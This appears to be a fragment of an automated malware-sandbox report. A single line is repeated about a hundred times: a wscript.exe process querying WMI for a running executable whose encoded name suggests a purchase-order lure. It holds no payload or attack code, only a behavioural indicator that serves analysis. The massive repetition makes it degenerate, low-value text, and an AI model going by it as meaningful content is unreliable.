                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
                        Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like &apos;#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 &amp; #U7ed8#U56fe#U6837#U672c.exe&apos;
